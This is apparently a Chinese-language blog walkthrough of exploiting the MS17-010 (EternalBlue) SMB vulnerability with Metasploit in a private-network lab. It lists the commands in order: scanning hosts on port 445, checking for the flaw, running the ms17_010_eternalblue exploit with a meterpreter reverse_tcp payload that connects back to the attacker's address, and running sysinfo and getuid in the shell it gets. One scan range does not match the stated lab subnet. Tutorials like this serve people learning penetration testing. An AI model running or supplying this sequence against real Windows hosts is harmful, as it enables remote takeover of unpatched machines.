攻击机:192.168.11.231

被攻击机:192.168.11.22

ms17-010-永恒之蓝漏洞

第一步:更新MSF:msfupdate,查找smb_ms17_010.rb模块

cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb

第二步:连接postgresql数据库,不连接的话扫描的信息的信息无法入库。连接上后可通过db_status查看状态

启动数据库:service postgresql start

启动msfconsole:msfconsole

ms17-010-永恒之蓝漏洞

使用db_status确认数据库是否正确连接

第三步:运行smb模块探测主机445端口开放情况。

use auxiliary/scanner/smb/smb_version

set rhosts 192.168.236.129/24

set threads 16

run

扫描完成后,扫描的信息会自动存入数据库,可通过hosts命令查看

ms17-010-永恒之蓝漏洞

第四步:使用smb_ms17_010模块探测MS17-010漏洞

use auxiliary/scanner/smb/smb_ms17_010

show options

services -r tcp -p 445 -R

扫描之前可通过info查看配置详情

ms17-010-永恒之蓝漏洞

第五步:使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置目标系统的IP和payload。

set RHOST 192.168.11.22

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.11.231

exploit执行攻击,成功返回会话。

ms17-010-永恒之蓝漏洞

第六步:坐等结果

meterpreter> sysinfo

meterpreter> getuid

ms17-010-永恒之蓝漏洞
ms17-010-永恒之蓝漏洞

MS17-010扫描模块截图

ms17-010-永恒之蓝漏洞

MS17-010攻击模块截图

ms17-010-永恒之蓝漏洞
ms17-010-永恒之蓝漏洞

攻击成功,得到SHELL!!!

相关文章:

  • 2021-04-06
  • 2022-01-03
  • 2021-05-21
  • 2021-11-11
  • 2021-12-23
  • 2021-10-27
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-07-01
  • 2022-01-13
  • 2021-04-17
  • 2021-10-27
  • 2021-10-04
  • 2021-11-15
  • 2022-12-23
相关资源
相似解决方案